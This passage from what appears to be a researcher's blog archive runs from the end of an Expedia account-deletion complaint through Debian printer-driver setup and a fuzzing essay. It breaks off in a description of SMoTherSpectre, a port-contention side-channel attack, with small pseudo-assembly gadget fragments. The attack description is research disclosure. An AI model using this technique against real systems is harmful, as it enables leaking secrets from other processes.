After finally reaching an agent (Jim), I explained the situation, again. I was told that this cannot happen as accounts with active reservations cannot be deleted. I explained the situation, again. He talked to his supervisor and told me that this should not happen. It took a while until he realized that the bug was on their end. When he did, he promised me to escalate, inform next level support, and connect me.

So I was connected. I waited on hold for 20 minutes, the next agent had no clue and I explained the situation, again.

Act 9: Expedia.com: May 29

The agent (Jay this time) observed that both accounts were deleted and insisted that deleting accounts with active reservations is not possible. He informed me that reactivating deleted accounts is unfortunately not possible (another canned response). I explained the whole situation, again, and, again, he understood that the bug was on their end. Again, he talked to his supervisor, and, again, promised to forward me to the next level.

So I was connected. I waited on hold for 40 minutes, the next agent had no clue and I explained the situation, again.

Act 10: Expedia.com: May 30

By the time I reached level 3 support (Sheryl this time), I was on the phone for 2 hours and 15 minutes. Sheryl told me that she was the last person in line and that there are no higher ups.

Sheryl again told me that there is no way to delete an account with active reservations. I explained the whole situation, again. She understood quickly that the bug was on their end but mentioned that there is no way to reinstantiate a closed account. She was unsure how to help me and mentioned that she would escalate my issue to their internal help desk after collecting some information.

I mentioned that I had been on the phone for 2 hours 30 minutes by that time. She responded that she'd first have to double check with the two hotels if my registrations were still active on their end. She managed to check the first reservation in 15 minutes. While working through the second reservation, we got disconnected after about 3 hours on the phone.

Act 11: Expedia.com: May 30

I received an email from Sheryl that we unfortunately got disconnected and that I should call back, referencing a case number so that the next agent could continue the work. Interestingly, this email was signed "Expedia Corporate Service". When calling the provided number, the system informed me that the expected wait time was 36 minutes. Given the massive amount of wait time for the previous call I gave up, figuring I would try again the next day.

Act 12: Expedia.com: May 31

I received a call at 1am followed by another email from Expedia.com with a different case number, mentioning that I should call back and that they are trying to reinstantiate my account.

So I called. Again, they were experiencing unexpected call volumes and I waited 20 minutes on hold until I spoke to Sarah, a nice agent trying to help me. After referencing the case number (I tried my luck with the second case number first, hoping they would reference the same case file -- I wonder if they garbage collect these numbers) she placed me on hold again as she had to speak to their helpdesk.

After reading the massive amount of messages that had been accumulated so far, she decided to escalate.

Act 13: Expedia.com: May 31

After 20 minutes on hold (the call has now been going on for another hour), Anna picked up and explained to me that she had taken over the call. She claimed that deleting an Expedia.ch account can never influence an Expedia.com account as these are two different systems. So I explained the whole situation, again.

After another brief hold, she asked me for the number of open points, when I was last able to log in, and the itinerary numbers of all open bookings. She collected the information and informed me that she sent it to the "higher department for account management" and that they would get back to me within 48 hours. She let me know that it was not my fault and that I would hear on how they will resolve the situation.

Total time of call: 75 minutes.

Let's eagerly await new information!

Act 14: Expedia.ch: June 1

I received an email from Expedia.ch that they require the two Expedia account numbers for further investigation. As Expedia has deleted my accounts and, when trying to login, claims that there are no accounts associated with my email, I responded that I don't have the account numbers. Interestingly, my two open bookings are still tied to my phone number and the agents (both CH/DE and USA) can look up my account information using my email address. I therefore told them to leverage my email to look up my account.

Act 15: Expedia.ch: June 1

Expedia.ch responded that they located my account and requested deletion (of the CH account) again. I responded that I'm no longer worried about deletion of my Expedia.ch account but that my Expedia.com as part of collateral damage due to their broken system. I'll await their answer.

Act 16: Expedia.ch: June 2

I received a reply from Expedia.ch stating: "May we kindly ask you to contact Expedia.com customer support as we can only handle bookings from Germany, Austria and Switzerland." The reply again shows that they did not understand the situation, i.e., that their deleting the Expedia.ch account caused the deletion of the Expedia.com account that was somehow linked due to a bug in their system.

I replied explaining the situation, again. Let's see what they do.

Not that I started feeling like Don Quixote a long time ago, but the feeling intensifies.

Act 17: Expedia.com: June 2

I received a note from corporate customer care that my original Expedia.com will be reactivated or my original points will be recredited. They will inform me when the request succeeds.

Act 18: Expedia.ch: June 3

I received a GDPR request from Expedia Germany that asks me to confirm my right to be forgotten. Interestingly, several agents told me that they can see all data from my "deleted" Expedia.ch account and always made sure to say it was deactivated and never said deleted. So I'm a little confused what they mean with this GDPR request and what will happen if I react to it. Due to the previous mess with the intermixed and interconnected accounts, I'm slightly worried what will happen if the account is not just deactivated but really deleted. Only time (and the next several acts) will tell.

Interestingly, this GDPR request brings up another question. As my data was copied from Expedia.com to Expedia.ch without my consent, copying all my personal data along with the personal data of 3 other travelers, I start to wonder if this is a severe GDPR violation.

Act 19: Expedia.com: June 6

After not having heard back anything from Mark in 4 work days, I reached out again and asked if there was any progress on their end. The story continues.

Act 20: Expedia.com: June 10

After not having heard back for another couple of days and with less than a week until my upcoming trip with two paid reservations on Expedia remaining, I've sent them another reminder. I also mentioned that I'm losing my patience (I assume this would be clear after 20 interactions but hey, they may be a little slow at the customer service department at Expedia). Let's see if I hear back.

Act 21: Expedia.ch: June 11

Later in the afternoon I received a series of emails that I apparently changed the email on my Expedia.com account. After a couple of these emails and a name change from Mathias Payer to GSO and an updated email of XXX@expedia.com I stopped receiving any more emails.

A couple of minutes later, I received an email from Katrin Rothe from Expedia.de regarding a GDPR request. She explained that linked accounts will automatically be deleted together and that reactivating accounts is not possible.

Her statements clearly contradicted several other previous statements and reassurances that a) accounts with active reservations cannot be deleted, b) the different Expedia entities are different and that the two accounts are independent, and c) that the account could be reinstantiated.

She instructed me to create a new account and they would 'reinstantiate my open points'. So I created a new account. I also asked her about the state of my reservations for next week which have already been paid and that I can no longer access.

I'm about 12-14 hours of emails, debugging, and pleading into this customer service nightmare. Looking back I should have just given up after the first interactions with the incompetent support but there was always this glimmer of hope and the sunk cost fallacy. Given the massive amount of effort on my end for a bug on their end, I feel that they have to compensate me for this issue (that is fully on their end).

Act 22: Expedia.com/ch: June 13

Another 2 days since my last interaction with the European Expedia branch and 3 days with the US branch. I have not received a reply or confirmation regarding my upcoming travel nor any compensation nor any other form of update. My newly created account is empty (neither points nor reservations nor any other data).

I therefore reached out both to the European and US Expedia customer service. Interestingly, my travel on the two already paid reservations is coming up in 3 days. I reminded customer service of their crap/non-existing service.

I'm thinking about filing a complaint regarding the GDPR violation and/or customer service issues as this is (and has been for a while) beyond reasonable. In the email, I told them that I'm expecting some form of compensation for my efforts.

Act 23: Expedia.??: June 13

As Expedia is no longer replying to my emails and I can no longer access the reservations through Expedia, I've reached out to the hotels directly to double check if my (already paid) bookings are still active.

One hotel replied in 10 minutes, the other after 4 hours. This is an amazing difference compared to my experience with Expedia.

Act 24: Expedia.com: June 14

I received Expedia spam that I should join their fancy reward program. Sigh. This is apparently how Expedia treats long term customers. I've sent them a final reminder, following up on the previous cases to see if they reply or not.

I haven't heard from Expedia since they completely removed the account reminders and half dead account on June 11. Instead of following up and reinstantiating my points, compensation, and status they completely dropped all contact and I'm now left without any confirmation for my reservations or any way to contact their support as they no longer reply to any requests.

Over the years I've seen bad customer support but treating high volume customers this way seems like a bad business strategy.

Act 25: Expedia.com: June 17

Mark responded with an email that he was out of the office and that I should have received an email explaining the situation. I'll be waiting for him to resend that email.

Act 26: Expedia.ch: June 18

A day after the end of the previous reservation and the day of the start of the second reservation, I received a note from Expedia Germany asking about my rewards balance and resending me the two reservations. Which seems a little late considering that the first reservation is already over and we have checked into the second hotel. It's also odd that they ask me about the points balance of my previous rewards account.

The service agent mentioned that she'll look into a compensation for my experience. I'll be waiting for more news.

Act 27: Expedia.com: June 20

Without any note or change from my end, I can no longer log into Expedia.com using my newly created account (from June 11). Expedia must have deleted this newly created account again as part of their analysis process. This is becoming more than ridiculous. Let me repeat: Expedia, after being unable to reinstantiate my deactivated account, asked me to create a new account and now also deleted this new account. The error message I get is the same as when they initially deleted the first account.

At least, I no longer get the spam messages about different amazing offers I could get.

Act 28: Expedia.ch: June 23

As my account has been deleted again and I did not receive any notification in another week -- despite promises from both .com and .ch support to contact me, I've sent another reminder to Expedia.ch, inquiring why my newly created account from early June has been deleted again.

I honestly don't know what these guys are doing and how they stay in business.

Act 29: Expedia.ch: June 29

After another couple of days of waiting (and giving up with Expedia), I received another email from Expedia priority support. The agent confirmed that my second account was 'accidentially' deleted as well and encouraged me to open another account and confirmed that a) this new account will not be deleted again (lol), b) that they will reassign me the open points from my previous account, and c) that they offer me 75 EUR for my difficulties.

Looking at the massive amount of time I have invested into their broken system, this results in an amazing hourly pay of about 5 EUR. Thanks Expedia!

I responded and am waiting for them to actually follow up. Let's see if they also reinstantiate my 'Gold' status.

Act 30: Expedia.com/ch: July 1

Almost two months after I started this unhappy journey, we have reached a conclusion and my open tickets have been closed. I received an email from Expedia Switzerland that they will gift me 75 EUR and return my points. Just a little later I received an email from Expedia.com customer support that my account had been successfully reactivated [sic].

When I logged in I saw that I received a coupon for 75$ (not Euros but close enoug I guess) and roughly 3000 points which corresponds to roughly 600 in spending. Unfortunately, I know that I've spent at least 400+620+170+240+600 on hotels in that timeframe that have not been credited, which should be 10150 points give or take.

Additionally, they did not reinstantiate the 'Gold' tier for what it's worth and I'm now a lowly 'Blue' tier.

Final act

My plan is now to spend the money/points I received on my next booking and then never to use Expedia again. Maybe I'll even try to delete my account again for some extra fun!

How to install a Canon MF633Cdw on a modern Debian

2019-06-10T16:03:00-04:00

Installing printers can be a pain. Installing printers on Linux results in an even bigger pain. Installing printers with wrong and crappy drivers and no open-source alternative is an endless amount of pain.

Kudos to Canon for hitting the trifecta.

So I've set out to get the drivers for my Canon MF633Cdw to work over the network. I've set up CUPS and everything else as it's supposed to be but I could not select the correct driver.

I therefore resorted to the Canon driver page and downloaded the Linux drivers. The tar archive comes with drivers for 32-bit and 64-bit. I obviously and naively installed the 64-bit drivers.

As it turns out, the Canon 64-bit driver have dependencies on 32-bit code and 32-bit programs. To get the driver to work, you need to:

$ tar xvzf linux-UFRII-drv-v360-uken-02.tar.gz
$ cd inux-UFRII-drv-v360-uken
$ cd 64-bit-Driver/Debian
$ sudo dpkg -i *.deb
$ sudo apt -f install
$ cd ../../32-bit-Driver/Debian
$ sudo dpkg --add-architecture i386
$ sudo dpkg -i *.deb
$ sudo apt -f install
$ cd ../../64-bit-Driver/Debian
$ sudo dpkg -i *.deb
$ cd ../../PPD/Debian
$ sudo dpkg -i *.deb
$ sudo service cups restart

Then you can add your fancy printer over the printer dialog. Now just make sure to not uninstall the i386 packages that apt thinks are no longer needed, because they are. Thanks to crappy drivers with 32-bit dependencies.

$ sudo apt-mark manual libatk1.0-0:i386 libavahi-client3:i386 \
  libavahi-common-data:i386 libavahi-common3:i386 libbsd0:i386 \
  libcairo2:i386 libcups2:i386 libdatrie1:i386 libdbus-1-3:i386 \
  libexpat1:i386 libffi6:i386 libfontconfig1:i386 libfreetype6:i386 \
  libgail-common:i386 libgail18:i386 libgcrypt20:i386 \
  libgdk-pixbuf2.0-0:i386 libglade2-0:i386 libglib2.0-0:i386 libgmp10:i386 \
  libgnutls30:i386 libgpg-error0:i386 libgraphite2-3:i386 \
  libgssapi-krb5-2:i386 libgtk2.0-0:i386 libharfbuzz0b:i386 \
  libhogweed4:i386 libicu57:i386 libidn11:i386 libjbig0:i386 \
  libjpeg62-turbo:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 \
  libkrb5support0:i386 liblz4-1:i386 libnettle6:i386 libp11-kit0:i386 \
  libpango-1.0-0:i386 libpangocairo-1.0-0:i386 libpangoft2-1.0-0:i386 \
  libpixman-1-0:i386 libpng16-16:i386 libstdc++6:i386 libsystemd0:i386 \
  libtasn1-6:i386 libthai0:i386 libtiff5:i386 libx11-6:i386 libxau6:i386 \
  libxcb-render0:i386 libxcb-shm0:i386 libxcb1:i386 libxcomposite1:i386 \
  libxcursor1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6:i386 \
  libxfixes3:i386 libxi6:i386 libxinerama1:i386 libxml2:i386 \
  libxrandr2:i386 libxrender1:i386

The Fuzzing Hype-Train: How Random Testing Triggers Thousands of Crashes

2019-04-01T10:25:00-04:00

Software contains bugs and some bugs are exploitable. Mitigations protect our systems in the presence of these vulnerabilities, often stopping the program when detecting a security violation. The alternative is to discover bugs during development and fixing them in the code. Despite massive efforts, finding and reproducing bugs is incredibly hard. Fuzzing is an efficient way of discovering security critical bugs by triggering exceptions such as crashes, memory corruption, or assertion failures automatically (or with a little help) and comes with a witness (proof of the vulnerability) that allows developers to reproduce the bug and fix it.

Software testing broadly focuses on discovering and patching bugs during development. Unfortunately, a program is only secure if it is free of unwanted exceptions and therefore requires proving the absence of security violations. For example, a bug becomes a vulnerability if any attacker-controlled input reaches a program location that allows a security violation such as memory corruption. Software security testing therefore requires reasoning about all possible executions of code at once to produce a witness that violates the security property. As Edsger W. Dijkstra said in 1970: "Program testing can be used to show the presence of bugs, but never to show their absence!"

System software such as browsers, runtime systems, or kernels are written in low level languages (such as C and C++) that are prone to exploitable, low level defects. Undefined behavior is at the root of low level vulnerabilities, e.g., invalid pointer dereferences resulting in memory corruption, casting to an incompatible type leading to type confusion, integer overflows, or API confusion. To cope with the complexity of current programs, companies like Google, Microsoft, or Apple integrate dynamic software testing into their software development cycle to find bugs.

Figure 1: Fuzzing consists of an execution engine and an input generation process to run executables (which are often instrumented with explicit memory safety checks). The input generation mechanism may leverage existing test cases and execution coverage to generate new test inputs. For each discovered crash, the fuzzer provides a witness (input that triggers the crash).

Fuzzing, the process of providing random input to a program to trigger unintended crashes, has been around since the early 80ies. Recently, we are seeing a revival of fuzzing techniques with several papers improving effectiveness at each top tier security conference. The idea of fuzzing is incredibly simple: execute a program in a test environment with random input and detect if it crashes. The fuzzing process is inherently sound but incomplete. By producing test cases and observing if the program under test crashes, fuzzing produces a witness for each discovered crash. As a dynamic testing technique, fuzzing is incomplete as it will neither cover all possible program paths nor data-flow paths except when run for an infinite amount of time, for non-trivial programs. Fuzzing strategies are inherently an optimization problem where the available resources are used to discover as many bugs as possible, covering as much of the program functionality as possible through a probabilistic exploration process. Due to its nature as a dynamic testing technique, fuzzing faces several unique challenges:

Input generation: fuzzers generate inputs based on a mutation strategy to explore new state. Being aware of the program structure allows the fuzzer to tailor input generation to the program. The underlying strategy determines how effectively the fuzzer explores a given state space. A challenge for input generation is the balance between exploring new paths (control flow) and executing the same paths with different input (data flow).
Execution engine: the execution engine takes newly generated input and executes the program under test with that input to detect flaws. Fuzzers must distinguish between benign and buggy executions. Not every bug results in an immediate segmentation fault and detecting state violation is a challenging task, especially as code generally does not come with a formal model. Additionally, the fuzzer must disambiguate crashes to uniquely identify bugs without missing true positives.
Coverage wall: fuzzing struggles with some aspects of code such as fuzzing a complex API, checksums in file formats, or hard comparisons such as a password check. Preparing the fuzzing environment is a crucial step to increase the efficiency of fuzzing.
Evaluating fuzzing effectiveness: defining metrics to evaluate the effectiveness for a fuzzing campaign is challenging. For most programs the state space is (close to) infinite and fuzzing is a brute force search in this state space. Deciding when to, e.g., move to another target, path, or input is a crucial aspect of fuzzing. Orthogonally, comparing different fuzzing techniques requires understanding of the strengths of a fuzzer and the underlying statistics to enable fair comparison.

Input generation

Input generation is essential to the fuzzing process as every fuzzer must automatically generate test cases to be run on the execution engine. The cost for generating a single input must be low, following the underlying philosophy of fuzzing where iterations are cheap. Through input generation, the fuzzer implicitly selects which parts of the program under test are executed. Input generation must balance data-flow and control-flow exploration (discovering new code areas compared to revisiting previously executed code areas with alternate data) while considering what areas to focus on. There are two fundamental forms of input generation: model-based input generation and mutation-based input generation. The first is aware of the input format while the latter is not.

Knowledge of the input structure given through a grammar enables model-based input generation to produce (mostly) valid test cases. The grammar specifies the input format and implicitly the explorable state space. Based on the grammar, the fuzzer can produce valid test cases that satisfy many checks in the program such as valid state checks, dependencies between fields, or checksums such as a CRC32. For example, without an input model the majority of randomly generated test cases will fail the equality check for a correct checksum and quickly error out without triggering any complex behavior. The model allows input generation to balance the generated test inputs according to the underlying input protocol. The disadvantage of model-based input generation is the need for an actual model. Most input formats are not formally described and will require an analyst to define the intricate dependencies.

Mutation-based input generation requires a set of seed inputs that trigger valid functionality in the program and then leverages random mutation to modify these seeds. Providing a set of valid inputs is significantly easier than formally specifying an input format. The input mutation process then constantly modifies these input seeds to trigger interesting behavior.

Regardless of the input mutation strategy, fuzzers need a fitness function to assess the quality of the new input, and guide the generation of new input. A fuzzer may leverage the program structure and code coverage as fitness functions. There are three different approaches to observing the program during fuzzing to provide input to the fitness function. Whitebox fuzzing infers the program specification through program analysis, but often results in untenable cost For example, the SAGE whitebox fuzzer leverages symbolic execution to explore different program paths. Blackbox fuzzing blindly generates new input without reflection. The lack of a fitness function limits blackbox fuzzing to functionality close to the provided test cases. Greybox fuzzing leverages light-weight program instrumentation instead of heavier-weight program analysis to infer coverage during the fuzzing campaign itself, merging analysis and testing.

Coverage-guided greybox fuzzing combines mutation-based input generation with program instrumentation to detect whenever a mutated input reaches new coverage. Program instrumentation tracks which areas of the code are executed and the coverage profile is tied to specific inputs. Whenever an input mutation generates new coverage, it is added to the set of inputs for mutation. This approach is incredibly efficient due to the low cost instrumentation but still results in broad program coverage. Coverage-guided fuzzing is the current de-facto standard, with AFL [Zal13l] and honggfuzz [Swi10] as the most prominent implementations. These fuzzers leverage execution feedback to tailor input generation without requiring deep insight into the program structure by the analyst.

A difficulty for input generation is the optimization between discovering new paths and evaluating existing paths with different data. While the first increases coverage and explores new program areas, the latter explores already covered code through different data-flow. Existing metrics have a heavy control-flow focus as coverage measures how much of the program has already been explored. Data-flow coverage is only measured implicitly with inputs that execute the same paths but with different data values. A good input generation mechanism balances the explicit goal of extending coverage with the implicit goal of rerunning the same input paths with different data.

Execution engine

After the fuzzer generates test cases, it must execute them in a controlled environment and detect when a bug is triggered. The execution engine takes the fuzz input, executes the program under test, extracts runtime information such as coverage, and detects crashes. Ideally a program would terminate whenever a flaw is triggered. For example, an illegal pointer dereference on an unmapped memory page results in a segmentation fault which terminates the program, allowing the executing engine to detect the flaw. Unfortunately, only a small subset of security violations will result in program crashes. Buffer overflows into adjacent memory locations, for example, may only be detected later if the overwritten data is used or may never be detected at all. The challenge for this component of the fuzzing process is to efficiently enable the detection of security violations. For example, without instrumentation, only illegal pointer dereferences to unmapped memory, control-flow transfers to non-executable memory, division by zero, or similar exceptions will trigger an exception.

To detect security violations early, the program under test may be instrumented with additional software guards. Security violations through undefined behavior for code written in systems languages are particularly tricky. Sanitization analyzes and instruments the program during the compilation process to detect security violations. Address Sanitizer (ASan) [SBP+12], the most commonly used sanitizer, probabilistically detects spatial and temporal memory safety violations by placing red-zones around allocated memory objects, keeping track of allocated memory, and carefully checking memory accesses. Other LLVM-based sanitizers cover undefined behavior (UBSan), uninitialized memory (MSan), or type safety violations through illegal casts [JBC+17]. Each sanitizer requires certain instrumentation that increases the performance cost. The usability of sanitizers for fuzzing therefore has to be carefully evaluated as, on one hand, it makes error detection more likely but, on the other hand, reduces fuzzing throughput.

The main goal of the execution engine is to execute as many inputs per second as possible. Several fuzzing optimizations such as fork servers, persistent fuzzing, or special OS primitives reduce the time for each execution by adjusting system parameters. Fuzzing with a fork server executes the program up to a certain point and then forks new processes at that location for each new input. This allows the execution engine to skip over initialization code that would be the same for each execution. Persistent fuzzing allows the execution engine to reuse processes in a pool with new fuzzing input, resetting state between executions. Different OS primitives for fuzzing reduce the cost of process creation by, e.g., simplifying page table creation and optimizing scheduling for short lived processes.

Modern fuzzing is heavily optimized and focuses on efficiency, measured by the number of bugs found per time. Sometimes, fuzzing efficiency is measured implicitly by the number of crashes found per time, but crashes are not unique and many crashes could point to the same bug. Disambiguating crashes to locate unique bugs is an important but challenging task. Multiple bugs may cause a program crash at the same location whereas one input may trigger multiple bugs. A fuzzer must triage crashes conservatively so that no true bugs are removed but the triaging must also be effective to not overload the analyst with redundant crashes.

Coverage wall

The key advantage of fuzzing compared to more heavyweight analysis techniques is its incredible simplicity (and massive parallelism). Due to this simplicity, fuzzing can get stuck in local minima where continuous input generation will not result in additional crashes or new coverage -- the fuzzer is stuck in front of a coverage wall. A common approach to circumvent the coverage wall is to extract seed values used for comparisons. These seed values are then used during the input generation process. Orthogonally, a developer can comment out hard checks such as CRC32 comparisons or checks for magic values. Removing these non-critical checks from the program requires a knowledgeable developer that custom-tailors fuzzing for each program.

Several recent extensions [SGS+16, RJK+17, PSP18, ISM+18] try to bypass the coverage wall by automatically detecting when the fuzzer gets stuck and then leveraging an auxiliary analysis to either produce new inputs or to modify the program. It is essential that this (sometimes heavyweight) analysis is only executed infrequently as alternating between analysis and fuzzing is costly and reduces fuzzing throughput.

Fuzzing libraries also faces the challenge of experiencing low coverage during unguided fuzzing campaigns. Programs often call exported library functions in sequence, building up complex state in the process. The library functions execute sanity checks and quickly detect illegal or missing state. These checks make library fuzzing challenging as the fuzzer is not aware of the dependencies between library functions. Existing approaches such as LibFuzzer require an analyst to prepare a test program that calls the library functions in a valid sequence to build up the necessary state to fuzz complex functions.

Evaluating fuzzing

In theory, evaluating fuzzing is straight forward: in a given domain, if technique A finds more unique bugs than technique B, then technique A is superior to technique B. In practice, evaluating fuzzing is incredibly hard due to the randomness of the process and domain specialization (e.g., a fuzzer may only work for a certain type of bugs or in a certain environment). Rerunning the same experiment with a different random seed may result in a vastly different number of crashes, discovered bugs, and number of iterations. A recent study [KRC+18] evaluated the common practices of recently published fuzzing techniques (and therefore also serves as overview of the current state of the art, going beyond this article). The study identified common benchmarking crimes when comparing different fuzzers and condensed their findings into four observations:

Multiple executions: A single execution is not enough due to the randomness in the fuzzing process. Input mutation relies on randomness to decide (according to the mutation strategy) where to mutate input and what to mutate. In a single run, one mechanism could discover more bugs simply because it is “lucky”. To evaluate different mechanisms, we require multiple trials and statistical tests to measure noise.
Crash triaging: Heuristics cannot be used as the only way to measure performance. For example, collecting crashing inputs or even stack bucketing does not uniquely identify bugs. Ground truth is needed to disambiguate crashing inputs and to correctly count the number of discovered bugs. A benchmark suite with ground truth will help.
Seed justification: The choice of seed must be documented as different starting seeds provide vastly different starting configurations and not all techniques cope with different seed characteristics equally well. Some mechanisms require a head start with seeds to execute reasonable functionality while others are perfectly fine to start with empty inputs.
Reasonable execution time: Fuzzing campaigns are generally executed for multiple days to weeks. Comparing different mechanisms based on a few hours of execution time is not enough. A realistic evaluation therefore must run fuzzing campaigns at least for 24 hours.

These recommendations make fuzzing evaluation more complex. Evaluating each mechanism now takes considerable amount of time with experiments running multiple days to get enough statistical data for a fair and valid comparison. Unfortunately, such a thorough evaluation is required as it enables a true comparison and a discussion of factors that enable better fuzzing results.

A call for future work

With the advent of coverage-guided greybox fuzzing [Zal13, Swi10], dynamic testing has seen a renaissance with many new techniques that improve security testing. While incomplete, the advantage of fuzzing is that each reported bug comes with a witness that allows the deterministic reproduction of the bug. Sanitization, the process of instrumenting code with additional software guards, helps to discover bugs closer to their source. Overall, security testing remains challenging, especially for libraries or complex code such as kernels or large software systems. As fuzzers become more domain specific, an interesting challenge will be the comparison across different domains (e.g., comparing a grey-box kernel fuzzer for use-after-free vulnerabilities with a blackbox protocol fuzzer is hard). Given the massive recent improvements of fuzzing, there will be exciting new results in the future. Fuzzing will help make our systems more secure by finding bugs during the development of code before they can cause any harm during deployment.

Fuzzing currently is an extremely hot research area in software security with several new techniques being presented at each top tier security conference. The research directions can be grouped into improving input generation, reducing the performance impact for each execution, better detection of security violations, or pushing fuzzing to new domains such as kernel fuzzing or hardware fuzzing. All these areas are exciting new dimensions and it will be interesting to see how fuzzing can be improved further.

References

[Zal13] Michał Zalewski. American Fuzzy Lop (AFL). http://lcamtuf.coredump.cx/afl/technical_details.txt 2013.

[Swi10] Robert Swiecki. Honggfuzz. https://github.com/google/honggfuzz/ 2010.

[SBP+12] Konstantin Serebryany and Derek Bruening and Alexander Potapenko and Dmitry Vyukov. AddressSanitizer: A Fast Address Sanity Checker. In Usenix ATC 2012.

[JBC+17] Yuseok Jeon and Priyam Biswas and Scott A. Carr and Byoungyoung Lee and Mathias Payer. HexType: Efficient Detection of Type Confusion Errors for C++. In ACM CCS 2017.

[SGS+16] Nick Stephens and John Grosen and Christopher Salls and Andrew Dutcher and Ruoyu Wang and Jacopo Corbetta and Yan Shoshitaishvili and Christopher Krugel and Giovanni Vigna. Driller: Augmenting Fuzzing Through Selective Symbolic Execution. In ISOC NDSS 2016.

[RJK+17] Sanjay Raway and Vivek Jain and Ashish Kumar and Lucian Cojocar and Cristiano Giuffrida and Herbert Bos. VUzzer: Application-aware evolutionary fuzzing. In ISOC NDSS 2017.

[PSP18] Hui Peng and Yan Shoshitaishvili and Mathias Payer. T-Fuzz: fuzzing by program transformation. In IEEE Security and Privacy 2018.

[ISM+18] Insu Yun and Sangho Lee and Meng Xu and Yeongjin Jang and Taesoo Kim. QSYM: A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing. In Usenix SEC 2018.

[KRC+18] George Klees and Andrew Ruef and Benji Cooper and Shiyi Wei and Michael Hicks. Evaluating Fuzz Testing. In ACM CCS 2018.

SMoTherSpectre: transient execution attacks through port contention

2019-03-06T16:22:00-05:00

Side channel attacks such as Spectre or Meltdown allow data leakage from an unwilling process. Until now, transient execution side channel attacks primarily leveraged cache-based side channels to leak information. The very purpose of a cache, that of providing faster access to a subset of data, enables information leakage. While the world focused on a string of exploits leveraging caches (and the memory hierarchy pyramid) and defenders tried to block data leakage through it, we look at the core tenet enabling the channel: contention.

Contention in a CPU is not limited to cache capacity; it manifests itself in a variety of forms when resources are shared. Freely sharing resources among untrusted entities allows an attacker process to infer when another (victim) process is contending for the resource, thereby slowing down the attacker.

A less obvious form of contention arises in Simultaneously Multi-Threaded (SMT) cores. The latter lay the foundation for nearly all modern x86 CPUs, IBM POWER8, Oracle T5 and Cavium ThunderX2/X3. In SMT, scheduling units called ports are shared among threads of execution which can be exploited to leak information. Port contention as a phenomenon has been previously discussed by Anders Fogh in his 2016 blog post.

We precisely characterize the port-induced side channel (that we call SMoTher) and demonstrate that it is possible to detect a sequence as small as a single (schedulable) instruction tied at design time to a specific subset of ports by leveraging contention. Leveraging SMoTher (instead of a cache-based side channel), we present a powerful, practical transient execution attack to leak secrets that may be held in registers or the closely-coupled L1 cache, called SMoTherSpectre. The full paper is on arXiv, the work is a collaboration between the EPFL HexHive and PARSA labs, and IBM Research Zurich and joint work between Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus.

Simultaneous multi-threading and scheduling

A Simultaneously Multi-threaded (SMT) CPU fetches and executes instructions for more than one thread on the same core. To the operating system/user, it appears as a greater number of logical cores than physical cores. The former is used to denote the capability to execute a thread, while the latter is the physical implementation of a unit (execution pipeline, registers, caches) called a core. These (colocated) threads have a few dedicated components per thread (fetch unit and architectural registers), while sharing the rest of the pipeline (branch predictors, reservation station, ports, execution units). Implementations differ in which components are shared or dedicated and the number of threads per physical core.

A typical modern, out-of-order processor schedules micro-ops from an unified reservation station to specialized execution units. See this presentation for an overview of scheduling on recent Intel microarchitectures. Core-series processors contain 5-8 ports to perform this scheduling. Each port is responsible for a fixed subset of execution units. Intel Skylake processors, specifically, contain eight ports. Four of them (0,1,5 and 6) are used to schedule operations to integer, floating-point, vector execution units among others. The other four ports handle loads, stores, and address generation operations. The execution units for the most commonly executed micro-ops are replicated and associated with multiple ports. With SMT, micro-ops from both co-located threads may reside in the same reservation station(s). In each cycle, a single micro-op from either thread may be scheduled by each port. See scheduling Ports on Intel Skylake processors for details of Intel Skylake scheduling.

SMoTher

When SMT threads have ready micro-ops which can use the same port, they must contend for it each cycle. Each thread would need to wait for a few cycles when the port under contention chooses to schedule a micro-op from another thread, causing a slowdown. This slowdown is detectable (by taking timestamps using rdtsc on Intel's CPUs), and allows a specially crafted thread to measure the co-located thread's utilization of a port.

Suppose threads A (Attacker) and V (Victim) run on the same physical Skylake core, where crc32 is scheduled by port 1 and fadd is scheduled by port 5. If a thread V only uses other ports (example, running fadds), thread A running 20 one-cycle crc32 instructions should require 20 cycles. However, if the reservation station also contains a single ready crc32 instruction from thread V, there should be one cycle where port 1 chooses it over the micro-ops from A. Overall, thread A now runs the same instruction in 21 cycles, which is a 5% slowdown. Longer sequences with contention have lead to attacker slowdown up to 35% in our experiments.

Each instruction in a sequence of code can be scheduled on specific ports. This allows us to create a port-fingerprint for every sequence, consisting of the expected utilization of each of the ports while scheduling that sequence. For a pair of victim sequences, V_a and V_b, with different port-fingerprints, a carefully crafted attacker thread can identify which victim sequence is concurrently run. Essentially, the attacker chooses one or more ports for which the victim sequences differ in the signature. By timing instructions specifically scheduled on these ports, the attacker can measure contention. Higher contention means that a concurrent victim is using the same ports (and vice versa), identifying the sequence. We call such pairs of instruction sequences SMoTher-differentiable.

To leak information, we look at data-dependent control flow (conditional branches) leading to SMoTher-differentiable sequences (as branch target and fallthrough). We call this a SMoTher-gadget. The attacker can identify the sequence following the branch, and thereby infer the outcome of the condition. The information leaked depends on the branch condition. Common examples include specific bits in registers or memory (for example, TEST 0x1, al; jz TGT, or CMPB 0x0, (rdx); jl TGT).

SMoTherSpectre

SMoTherSpectre is a speculative code-reuse attack. Speculative execution at particular points of a victim's execution is influenced to execute SMoTher-gadgets, leaking information.

As an example, an attacker can use branch target injection (BTI) to redirect the speculative execution following an indirect jump/call (until the target is calculated) on a co-located victim process (shared branch predictor). This code sequence, including the indirect branch, is named the BTI gadget. At this point, we require a register or a memory location (with a pointer to it) to hold the secret to be leaked. The code below is an example BTI gadget, where a secret is loaded into rdi and the indirect jump will eventually branch to the pointer target loaded into rax.

BTI gadget:
 load rdi, (secret)
 load rax, (pointer)
 jmp [rax]

The poisoned target leads the victim to execute a different data-dependent control-flow sequence--i.e., a conditional branch--somewhere in the victim code. The condition must use the secret, so that the branch leaks the outcome of the condition if the attacker can figure out which instructions the victim executed just afterwards (i.e., either the branch target or the fall-through). For SMoTher-gadgets, conditional branches where the two subsequent paths are SMoTher-differentiable, the attacker can figure out if the branch was taken or not taken by introducing contention on one or more ports which the target and fallthrough use for different number of cycles. In the SMoTher-gadget shown below, crc32 is scheduled by port 1 on Skylake, while ror is scheduled on ports 0 and 6.

SMoTher gadget:
 cmp rdi, 0
 jl <mark>
 crc32
 crc32
 ...
